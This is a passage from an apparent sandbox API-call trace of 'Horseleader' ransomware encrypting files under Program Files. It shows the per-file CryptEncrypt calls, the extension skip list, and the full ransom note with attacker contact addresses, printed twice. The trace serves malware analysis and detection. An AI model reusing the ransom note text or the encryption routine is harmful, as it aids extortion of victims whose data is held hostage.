(lpString1="Filters.xml", lpString2="#Decrypt#.txt") returned 1 [0251.994] lstrcmpW (lpString1="Filters.xml", lpString2="_uninstalling_.png") returned 1 [0251.994] lstrlenW (lpString=".testttjffg") returned 11 [0251.994] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml", 
lpSrch=".testttjffg") returned 0x0 [0251.994] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.994] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.994] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.995] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e437ad, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93e437ad, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x689cd275, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8edf, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Parity.fx", cAlternateFileName="")) returned 1 [0251.996] lstrcmpiW (lpString1="Parity.fx", lpString2="Windows") returned -1 [0251.996] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx") returned 47 [0251.996] StrStrIW (lpFirst="Parity.fx", lpSrch=".horseleader") returned 0x0 [0251.996] lstrcmpW (lpString1="Parity.fx", lpString2="#Decrypt#.txt") returned 1 [0251.996] lstrcmpW (lpString1="Parity.fx", lpString2="_uninstalling_.png") returned 1 [0251.996] lstrlenW (lpString=".testttjffg") returned 11 [0251.996] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx", lpSrch=".testttjffg") returned 0x0 [0251.996] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.996] 
CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx" (normalized: "c:\\program files\\dvd maker\\shared\\parity.fx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.997] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e437ad, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93e437ad, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x689cd275, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8edf, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Parity.fx", cAlternateFileName="")) returned 0 [0251.997] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0251.997] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\#Decrypt#.txt") returned 51 [0251.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0252.000] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.000] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0252.001] lstrlenA (lpString="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") returned 1368 [0252.001] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0252.001] CloseHandle (hObject=0x1cc) returned 1 [0252.001] GetProcessHeap () returned 0x780000 [0252.001] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0252.001] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="soniccolorconverter.ax", cAlternateFileName="")) returned 1 [0252.001] lstrcmpiW (lpString1="soniccolorconverter.ax", lpString2="Windows") returned -1 [0252.002] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax") returned 53 [0252.002] StrStrIW (lpFirst="soniccolorconverter.ax", lpSrch=".horseleader") returned 0x0 [0252.002] lstrcmpW (lpString1="soniccolorconverter.ax", lpString2="#Decrypt#.txt") returned 1 [0252.002] lstrcmpW (lpString1="soniccolorconverter.ax", lpString2="_uninstalling_.png") returned 1 [0252.002] lstrlenW (lpString=".testttjffg") returned 11 [0252.002] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax", lpSrch=".testttjffg") returned 0x0 [0252.002] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.002] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.002] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax" (normalized: "c:\\program files\\dvd maker\\soniccolorconverter.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.002] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bdd9df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bdd9df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="sonicsptransform.ax", cAlternateFileName="")) returned 1 [0252.002] lstrcmpiW (lpString1="sonicsptransform.ax", lpString2="Windows") returned -1 [0252.002] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax") returned 50 [0252.003] StrStrIW (lpFirst="sonicsptransform.ax", lpSrch=".horseleader") returned 0x0 [0252.003] lstrcmpW (lpString1="sonicsptransform.ax", lpString2="#Decrypt#.txt") returned 1 [0252.003] lstrcmpW (lpString1="sonicsptransform.ax", lpString2="_uninstalling_.png") returned 1 [0252.003] lstrlenW (lpString=".testttjffg") returned 11 [0252.003] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax", lpSrch=".testttjffg") returned 
0x0 [0252.003] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.003] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.003] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax" (normalized: "c:\\program files\\dvd maker\\sonicsptransform.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.003] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bb787f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bb787f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="WMM2CLIP.dll", cAlternateFileName="")) returned 1 [0252.003] lstrcmpiW (lpString1="WMM2CLIP.dll", lpString2="Windows") returned 1 [0252.003] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll") returned 43 [0252.003] StrStrIW (lpFirst="WMM2CLIP.dll", lpSrch=".horseleader") returned 0x0 [0252.004] lstrcmpW (lpString1="WMM2CLIP.dll", lpString2="#Decrypt#.txt") returned 1 [0252.004] lstrcmpW (lpString1="WMM2CLIP.dll", lpString2="_uninstalling_.png") returned 1 [0252.004] lstrlenW (lpString=".testttjffg") returned 11 [0252.004] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll", lpSrch=".testttjffg") returned 0x0 [0252.004] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.004] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.004] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll" (normalized: "c:\\program files\\dvd maker\\wmm2clip.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.004] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bb787f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bb787f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="WMM2CLIP.dll", cAlternateFileName="")) returned 0 [0252.004] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0252.005] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\#Decrypt#.txt") returned 44 [0252.005] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0252.006] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.006] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0252.007] lstrlenA (lpString="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") returned 1368 [0252.007] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0252.007] CloseHandle (hObject=0x164) returned 1 [0252.007] GetProcessHeap () returned 0x780000 [0252.007] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0252.008] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe2fb0dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2fb0dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0252.008] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0252.008] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer") returned 38 [0252.008] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0252.008] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0252.008] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Internet Explorer", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.008] GetProcessHeap () returned 0x780000 [0252.008] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7c8598 [0252.008] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\*") returned 40 [0252.008] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe2fb0dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2fb0dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0252.008] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.008] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\.") returned 40 [0252.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.009] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe2fb0dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2fb0dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0252.009] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.009] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\..") returned 41 [0252.009] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.009] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.009] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: 
lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30f0ae80, ftCreationTime.dwHighDateTime=0x1d58b4d, ftLastAccessTime.dwLowDateTime=0x2b7795b0, ftLastAccessTime.dwHighDateTime=0x1d5b46d, ftLastWriteTime.dwLowDateTime=0x2b7795b0, ftLastWriteTime.dwHighDateTime=0x1d5b46d, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="alpha cornwall peripheral.exe", cAlternateFileName="ALPHAC~1.EXE")) returned 1 [0252.009] lstrcmpiW (lpString1="alpha cornwall peripheral.exe", lpString2="Windows") returned -1 [0252.009] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\alpha cornwall peripheral.exe") returned 68 [0252.009] StrStrIW (lpFirst="alpha cornwall peripheral.exe", lpSrch=".horseleader") returned 0x0 [0252.009] lstrcmpW (lpString1="alpha cornwall peripheral.exe", lpString2="#Decrypt#.txt") returned 1 [0252.009] lstrcmpW (lpString1="alpha cornwall peripheral.exe", lpString2="_uninstalling_.png") returned 1 [0252.009] lstrlenW (lpString=".testttjffg") returned 11 [0252.009] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\alpha cornwall peripheral.exe", lpSrch=".testttjffg") returned 0x0 [0252.009] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.009] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\alpha cornwall peripheral.exe" (normalized: "c:\\program files\\internet explorer\\alpha cornwall peripheral.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.010] FindNextFileW (in: hFindFile=0x7c6720, 
lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="en-US", cAlternateFileName="")) returned 1 [0252.010] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0252.010] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US") returned 44 [0252.010] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0252.010] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0252.010] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.010] GetProcessHeap () returned 0x780000 [0252.010] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0252.010] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*") returned 46 [0252.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0252.012] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.012] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\.") returned 46 [0252.012] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.012] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0252.012] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.012] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\..") returned 47 [0252.013] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.013] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.017] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0252.017] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="Windows") returned -1 [0252.017] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned 59 [0252.018] StrStrIW (lpFirst="hmmapi.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.018] lstrcmpW (lpString1="hmmapi.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.018] 
lstrcmpW (lpString1="hmmapi.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.018] lstrlenW (lpString=".testttjffg") returned 11 [0252.018] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.018] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.018] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.018] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.020] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="iedvtool.dll.mui", cAlternateFileName="")) returned 1 [0252.020] lstrcmpiW (lpString1="iedvtool.dll.mui", lpString2="Windows") returned -1 [0252.020] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui") returned 61 [0252.020] StrStrIW (lpFirst="iedvtool.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.020] lstrcmpW (lpString1="iedvtool.dll.mui", 